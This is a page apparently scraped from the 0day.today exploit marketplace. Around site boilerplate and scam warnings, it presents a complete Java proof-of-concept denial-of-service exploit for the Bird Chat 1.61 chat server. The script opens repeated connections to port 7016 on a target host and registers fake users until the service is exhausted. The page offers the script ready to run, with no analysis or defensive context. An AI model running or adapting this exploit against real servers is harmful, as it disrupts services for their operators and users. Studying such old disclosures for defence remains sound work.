0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bird Chat 1.61 Denial Of Service Exploit
======================================== Bird Chat 1.61 Denial Of Service Exploit ======================================== /* Bird Chat 1.61 - Denial Of Service - Proof Of Concept Coded by: Donato Ferrante */ import java.net.Socket; import java.net.InetAddress; import java.net.ConnectException; import java.net.SocketTimeoutException; import java.io.OutputStream; import java.io.InputStream; public class BirdChat161_DoS_poc { private final static int MAX_CONNECTION = 16; private final static int PORT = 7016; private final static String VERSION = "0.1.0"; public static void main(String [] args){ System.out.println( "\n\nBird Chat 1.61 - Denial Of Service - Proof Of Concept\n" + "Version: " + VERSION + "\n\n" + "coded by: Donato Ferrante\n" + "e-mail: fdonato@autistici.org\n" + "web: www.autistici.org/fdonato\;n\n" ); String host = "localhost"; try{ if(args.length != 1) usage(); host = args[0]; }catch(Exception e){usage();} try{ int i = 1, var = 0; while(i++ <= MAX_CONNECTION){ try{ String err = ""; int port = PORT; InetAddress addr = InetAddress.getByName(host); Socket socket = new Socket(addr, port); socket.setSoTimeout(3000); InputStream stream = socket.getInputStream(); int line = stream.read(); while(line != -1){ if(line == '?'){ break; } line = stream.read(); } OutputStream outStream = socket.getOutputStream(); outStream.write(("*user=fake_user0" + ++var + "\n").getBytes()); int count = 0; line = stream.read(); while(true){ line = stream.read(); if(line == '\n') count++; if(count >= 3) break; } }catch(SocketTimeoutException ste){break;} catch(ConnectException ce){System.err.println(ce); continue;} } }catch(Exception e){System.err.println(e);} System.out.println("\nBird Chat - Denial Of Service - Proof_Of_Concept terminated.\n\n"); } private static void usage(){ System.out.println("Usage: java BirdChat161_DoS_poc <host>\n\n"); System.exit(-1); } } # 0day.today [2024-12-24] #